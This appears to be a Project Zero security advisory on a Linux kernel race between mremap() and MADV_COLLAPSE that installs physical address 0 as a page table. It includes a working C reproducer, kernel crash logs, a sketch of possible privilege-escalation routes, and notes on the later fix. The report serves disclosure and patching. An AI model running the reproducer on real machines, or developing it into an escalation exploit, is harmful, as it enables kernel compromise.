Linux 6.6 Race Condition

Summary

I found a security-relevant race between mremap() and the THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: for example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which in turn can probably lead to stale TLB entries pointing to freed pages.

I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I’m pretty sure they’re not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you’re curious, but I think they’re stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.

I will send a suggested patch for the security bug, but I think it’s unclear if my patch is actually the right way to fix it.

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.

For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html
Security bug: move_normal_pmd vs MADV_COLLAPSE
Description

In mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, …) is called, which first takes rmap locks, then does move_normal_pmd().
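
For orientation, the relevant part of the move_page_tables() loop looks roughly like this (a heavily abbreviated paraphrase of mm/mremap.c around 6.6, not the exact kernel code); note that *old_pmd is read and classified before move_pgt_entry() has any chance to take the rmap locks:

/* Heavily abbreviated paraphrase of the move_page_tables() loop, not the exact kernel code. */
for (; old_addr < old_end; old_addr += extent, new_addr += extent) {
	/* ... compute extent, cond_resched(), etc. ... */
	old_pmd = get_old_pmd(vma->vm_mm, old_addr);   /* no rmap locks held here */
	if (!old_pmd)
		continue;
	new_pmd = alloc_new_pmd(vma->vm_mm, vma, new_addr);
	if (!new_pmd)
		break;
	if (is_swap_pmd(*old_pmd) || pmd_trans_huge(*old_pmd)) {
		/* huge PMD path (move_pgt_entry(HPAGE_PMD, ...) or split) */
	} else if (IS_ENABLED(CONFIG_HAVE_MOVE_PMD) && extent == PMD_SIZE) {
		/*
		 * *old_pmd looked like a normal page-table pointer above, but the
		 * rmap locks are only taken inside move_pgt_entry().
		 */
		if (move_pgt_entry(NORMAL_PMD, vma, old_addr, new_addr,
				   old_pmd, new_pmd, true))
			continue;
	}
	/* ... otherwise fall back to move_ptes() ... */
}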

move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:

/* Clear the pmd */
pmd = *old_pmd;
pmd_clear(old_pmd);

VM_BUG_ON(!pmd_none(*new_pmd));

pmd_populate(mm, new_pmd, pmd_pgtable(pmd));
flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);

The problem is: the rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same file on a tmpfs mount with huge=advise):

process A                              process B
=========                              =========
mremap
  mremap_to
    move_vma
      move_page_tables
        get_old_pmd
        alloc_new_pmd
        *** PREEMPT ***
                                       madvise(MADV_COLLAPSE)
                                         do_madvise
                                           madvise_walk_vmas
                                             madvise_vma_behavior
                                               madvise_collapse
                                                 hpage_collapse_scan_file
                                                   collapse_file
                                                     retract_page_tables
                                                       i_mmap_lock_read(mapping)
                                                       pmdp_collapse_flush
                                                       i_mmap_unlock_read(mapping)
        move_pgt_entry(NORMAL_PMD, ...)
          take_rmap_locks
            move_normal_pmd
              drop_rmap_locks

In this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:

pmd_populate(mm, new_pmd, pmd_pgtable(pmd));

runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the x86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address – so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.

So this ends up installing physical address 0 as a page table.
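
To illustrate the arithmetic, here is a minimal userspace sketch, assuming an x86-64-style layout with 4K pages; the mask and helper names below are simplified stand-ins, not the kernel's actual macros:

#include <stdio.h>
#include <stdint.h>

#define PAGE_SHIFT   12
/* hypothetical, simplified stand-in for the PFN bits of a PMD entry */
#define PMD_PFN_MASK 0x000ffffffffff000ULL

/* simplified stand-in for pmd_pfn(): mask off the flag bits, shift to get a PFN */
static uint64_t fake_pmd_pfn(uint64_t pmd_val) {
  return (pmd_val & PMD_PFN_MASK) >> PAGE_SHIFT;
}

int main(void) {
  uint64_t cleared_pmd = 0; /* what move_normal_pmd() sees after losing the race */
  uint64_t pfn = fake_pmd_pfn(cleared_pmd);
  /* pmd_pgtable()/pmd_page() effectively do pfn_to_page(pmd_pfn(pmd)),
   * so a zero entry resolves to the page for physical address 0. */
  printf("pfn = %llu, physical address = 0x%llx\n",
         (unsigned long long)pfn,
         (unsigned long long)(pfn << PAGE_SHIFT));
  return 0;
}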
Fixing it

I guess there are two ways we could fix this:

1. Hold the rmap locks much more broadly in move_page_tables(): in particular, take them before inspecting the source PMD, and if we do a PMD-level move, keep them held throughout the entire move.
2. Add a bunch of extra recheck/retry logic.

I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.

I will send a suggested patch for the first option in a minute (and I have tested that, with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding about whether this is the right way to patch it, and if so, whether the patch does too little lock-dropping for performance or adds too much complexity with the lock-dropping…
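
Purely as an illustration of what option 1 could look like (a sketch, not the actual patch; take_rmap_locks()/drop_rmap_locks() and move_normal_pmd() are the existing mremap helpers, but the surrounding structure here is invented):

/* Sketch of option 1, not the actual patch: take the rmap locks before
 * looking at *old_pmd and keep them held across the PMD-level move, so
 * retract_page_tables() cannot clear the entry in between. */
take_rmap_locks(vma);
if (!pmd_none(*old_pmd) && !pmd_trans_huge(*old_pmd) && extent == PMD_SIZE)
	moved = move_normal_pmd(vma, old_addr, new_addr, old_pmd, new_pmd);
drop_rmap_locks(vma);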
Reproducer

I made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:

#define _GNU_SOURCE
#include <err.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/ioctl.h>

static void pin_to(int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
    err(1, "set affinity");
}

#ifndef MADV_COLLAPSE
#define MADV_COLLAPSE 25
#endif

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

int main(void) {
  // set up new mount ns for tmpfs with THP
  int outer_uid = getuid();
  int outer_gid = getgid();
  SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));
  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));
  write_file("/proc/self/setgroups", "deny");
  write_map("/proc/self/uid_map", outer_uid);
  write_map("/proc/self/gid_map", outer_gid);

  // make tmpfs with THP
  SYSCHK(mount("none", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "huge=advise"));

  pin_to(0);
  while (1) {
    int fd = SYSCHK(open("/tmp/a", O_RDWR|O_CREAT, 0600));
    void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));
    SYSCHK(ftruncate(fd, 0x1000));
    *((volatile char *)ptr) = 'a';
    SYSCHK(ftruncate(fd, 0x200000));
    SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));

    close(fd);
    SYSCHK(unlink("/tmp/a"));
    int child = SYSCHK(fork());
    if (child == 0) {
      for (int i=0; i<512; i++)
        ((volatile char *)ptr)[0x1000*i] = 'a';

      struct sched_param param = { .sched_priority = 0 };
      SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));

      /* race (outer side, will be preempted) */
      SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));
      return 0;
    }

    for (int i=0; i<512; i++)
      ((volatile char *)ptr)[0x1000*i] = 'a';

    usleep(10);
    /* race (inner side, will preempt after timer and voluntary resched) */
    int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);
    if (madv_res == -1)
      fprintf(stderr, "_");

    int wstatus;
    SYSCHK(waitpid(child, &wstatus, 0));

    SYSCHK(munmap(ptr, 0x200000));

    fprintf(stderr, ".");
  }
}

Usage:

user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.c
user@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist
...................................................................

Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):

[ 120.427189] BUG: Bad page map in process collapse-vs-mre pte:f000ff53f000ff53 pmd:00000067
[ 120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0
[ 120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G W 6.11.0 #493
[ 120.433591] Tainted: [W]=WARN
[ 120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 120.435849] Call Trace:
[ 120.436375] <TASK>
[ 120.436843] dump_stack_lvl+0x53/0x70
[ 120.437570] print_bad_pte+0x4e6/0x8e0
[…][ 120.447625] vm_normal_page+0x1c8/0x260
[…][ 120.450162] unmap_page_range+0x914/0x3d10
[…][ 120.456954] unmap_vmas+0x1cc/0x390
[…][ 120.461123] exit_mmap+0x160/0x6c0
[…][ 120.465181] mmput+0xa0/0x3a0
[ 120.465793] do_exit+0x7cd/0x27f0
[…][ 120.472198] do_group_exit+0xac/0x230
[ 120.472916] __x64_sys_exit_group+0x3e/0x50
[ 120.473722] x64_sys_call+0x17f3/0x1800
[ 120.474469] do_syscall_64+0x4b/0x110
[ 120.475189] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[…][ 120.489560] </TASK>

On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm’s pagetable bytes counter being -4096 on process exit.
Impact

Reaching this bug requires that you can create shmem/file THP mappings – anonymous THP uses different code that doesn’t zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they’re not affected.)

As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).

If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.

At that point, I think several bad things can happen that could lead to privilege escalation, though I haven’t tested that:

1. When a PTE is zapped through the page table's first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.
2. If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and then munmap() VMA 1, you'll end up with an anonymous page that's only mapped into a VMA that is not associated with the page's anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)

I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 – but that seems to be the case at least on the two x86 systems I tested this on.
Non-issue 2 (no impact): move_ptes vs MADV_COLLAPSE

move_ptes() locks the source and destination page tables as follows:

old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);
if (!old_pte)
	return -EAGAIN;
new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);
if (!new_pte) {
	pte_unmap_unlock(old_pte, old_ptl);
	return -EAGAIN;
}
if (new_ptl != old_ptl)
	spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);

pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.
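
For reference, the recheck that pte_offset_map_lock() performs is what the nolock-plus-manual-spin_lock pattern above is missing. Roughly paraphrased from memory of __pte_offset_map_lock() in kernels of this era (details may differ):

/* Rough paraphrase of __pte_offset_map_lock(), not the exact kernel code. */
again:
	pte = __pte_offset_map(pmd, addr, &pmdval);
	if (unlikely(!pte))
		return pte;
	ptl = pte_lockptr(mm, &pmdval);
	spin_lock(ptl);
	if (likely(pmd_same(pmdval, pmdp_get_lockless(pmd)))) {
		/* the page table is still attached to this PMD entry */
		*ptlp = ptl;
		return pte;
	}
	/* lost a race against page table removal; unlock and retry */
	pte_unmap_unlock(pte, ptl);
	goto again;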
Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_order

The classic way mremap() used to work is:

1. We make a new VMA.
2. We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.
3. If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.

As a comment in move_page_tables() explains:

/*
 * On error, move entries back from new area to old,
 * which will succeed since page tables still there,
 * and then proceed to unmap new area instead of old.
 */

However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):

1. move_vma() calls move_page_tables().
2. move_page_tables() moves an anonymous huge PMD entry.
3. move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.
4. Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).
5. move_vma() calls move_page_tables() in the reverse direction to move PTEs back.
6. move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.
7. do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.

So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn’t lead to any major consequences.

FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.

I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, …), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.
Comments
ja…@google.com <ja…@google.com> #2, Oct 15, 2024 11:05AM

The fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.
ja…@google.com <ja…@google.com> #3, Oct 22, 2024 09:28AM
Marked as fixed, reassigned to ja…@google.com.

Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa (“mm/mremap: fix move_normal_pmd/retract_page_tables race”).

In stable releases:

6.6.58 (2024-10-22)
6.11.5 (2024-10-22)

Related CVE Number: CVE-2024-50066.

Credit: Jann Horn
